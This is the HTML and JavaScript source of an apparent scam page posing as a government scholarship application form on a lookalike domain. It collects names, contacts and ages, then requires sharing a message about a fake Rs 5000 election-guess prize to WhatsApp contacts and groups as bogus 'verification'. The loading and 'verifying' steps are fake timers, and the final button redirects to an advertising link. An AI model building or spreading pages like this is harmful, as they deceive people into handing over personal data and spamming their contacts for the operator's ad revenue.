<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Register</title>
<meta content='https://scholarships-gov.z0q.xyz/how.png' property='og:image'/>
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Register" />
<meta property="og:site_name" content="Register" />

<style>
       body {
        font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        background: #d0d0d0;
        margin: 0;
        padding: 0;
        display: flex;
        justify-content: center;
        align-items: center;
        min-height: 100vh;
    }

    .form-container {
        background-color:#fff;
        padding: 40px;
        box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.2);
        max-width: 600px;
        width: 90%;
        animation: fadeIn 1s ease;
    }

    @keyframes fadeIn {
        from {
            opacity: 0;
            transform: translateY(-20px);
        }
        to {
            opacity: 1;
            transform: translateY(0);
        }
    }

    .form-container h2 {
        text-align: center;
        margin-bottom: 30px;
        color: #333;
        text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.2);
        animation: slideIn 1s ease;
    }

    @keyframes slideIn {
        from {
            opacity: 0;
            transform: translateY(-20px);
        }
        to {
            opacity: 1;
            transform: translateY(0);
        }
    }

    .form-group {
        margin-bottom: 20px;
        animation: slideIn 1s ease;
    }

    .form-group label {
        font-weight: bold;
        display: block;
        margin-bottom: 10px;
        color: #555;
    }

    .form-group input {
        width: 100%;
        padding: 12px;
        border: 1px solid #ced4da;
        border-radius: 5px;
        box-sizing: border-box;
        font-size: 16px;
        background-color: #f2f2f2;
        transition: border-color 0.3s ease;
    }

    .form-group input:focus {
        outline: none;
        border-color: #ff6347;
    }

    .form-group .error-message {
        color: red;
        font-size: 0.8rem;
        margin-top: 5px;
        animation: fadeIn 1s ease;
    }

    .form-group .success-message {
        color: green;
        font-size: 0.8rem;
        margin-top: 5px;
        animation: fadeIn 1s ease;
    }

    .form-group button {
        padding: 12px 20px;
        background-color: #ff6347;
        color: #fff;
        border: none;
        border-radius: 5px;
        cursor: pointer;
        transition: background-color 0.3s ease;
        width: 100%;
        font-size: 16px;
        font-weight: bold;
        text-transform: uppercase;
        letter-spacing: 1px;
        animation: slideIn 1s ease;
    }

    .form-group button:hover {
        background-color: #ff4500;
    }

    .share-container {
        text-align: center;
        margin-top: 20px;
    }

    #shareBtn {
        background-color: #25d366;
        color: #fff;
        padding: 15px 30px;
        border: none;
        border-radius: 50px;
        cursor: pointer;
        outline: none;
        font-size: 12px;
        font-weight: bold;
        text-transform: uppercase;
        transition: background-color 0.3s, transform 0.2s;
        box-shadow: 0px 4px 6px rgba(0, 0, 0, 0.1);
        letter-spacing: 1px;
        animation: fadeIn 1s ease;
    }

    #shareBtn:hover {
        background-color: #128c7e;
        transform: scale(1.05);
    }

    .hidden {
        display: none;
    }

    .loading {
        display: none;
        /* Define your loading animation styles */
    }

    .message {
        margin-top: 20px;
        padding: 13px 30px;
        border-radius: 15px;
        background-color: #ffa500;
        color: #fff;
        font-size: 12px;
        font-weight: bold;
        box-shadow: 0px 4px 6px rgba(0, 0, 0, 0.1);
        text-transform: uppercase;
        text-align: center;
        letter-spacing: 1px;
        animation: slideIn 1s ease;
    }

    .center {
        text-align: center;
        display: none;
        animation: slideIn 1s ease;
    }
    a{
        text-decoration: none;
    }
</style>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
</head>
<body>
<div class="form-container">
    <h2>Application Form</h2>
    <div class="form-group">
        <label >Your Name:</label>
        <input type="text"  placeholder="Enter your name" required>
    </div>
    <div class="form-group">
        <label f>Your Email/Phone:</label>
        <input type="text" placeholder="Enter your email/phone" required>

    </div>
    <div class="form-group">
        <label>Your Age:</label>
        <input type="number"  placeholder="Enter your age" required>
    </div>

    <div class="form-group">
        <button id="submitButton">Submit</button>
    </div>
    <div class="center">
        <div class="share-container">
            <b>Share with 10 friends / 5 groups on WhatsApp to complete your submission and verify that you are not a robot.</b><br>
            <button id="shareBtn">Share on WhatsApp</button>
        </div>
        <div id="loadingAnimation" class="loading">Loading...</div>
        <div id="verificationText" class="hidden message">Verifying your share...</div>
      <a href="result" onclick="fun()" target="_blank"><div id="successText" class="hidden message">Submit Application</div></a>
    </div>
</div>


<script>
$(document).ready(function(){

    $("#submitButton").click(function(){
  $(".center").show();
  $("#submitButton").hide();

});


    $('#shareBtn').click(function(){
        var loadingAnimation = $('#loadingAnimation');
        var verificationText = $('#verificationText');
        var successText = $('#successText');
        var sumi = $('#submitButton');
        var text1 = "🇮🇳 *Guess the winner of 2024 Election and win Rs 5000* 🇮🇳 %0A%0ASubmit your guess it's completely free 👇%0Ahttps://guessthewinner.z0q.xyz/" 

        window.open('whatsapp://send?text=' + text1);

        loadingAnimation.show();
        setTimeout(function() {
            loadingAnimation.hide();
            verificationText.show();
            setTimeout(function() {
                verificationText.hide();
                successText.show();
                setTimeout(function() {
                    successText.hide();
                }, 28000); // Display success message for 8 seconds
            }, 8000); // Display verifying message for 2 seconds
        }, 1000); // Display loading animation for 1 second
    });
});
</script>

<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-70VVMTR0PB"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-70VVMTR0PB');
</script>
<script>
function fun() {
    
setTimeout(function(){
            window.location.href = 'https://wesmallproclaim.com/agyv7ex6?key=96eb9366cb1c6c1b8ab6ab46c574e6fb';
         }, 1000);
}

</script>
</body>
</html>
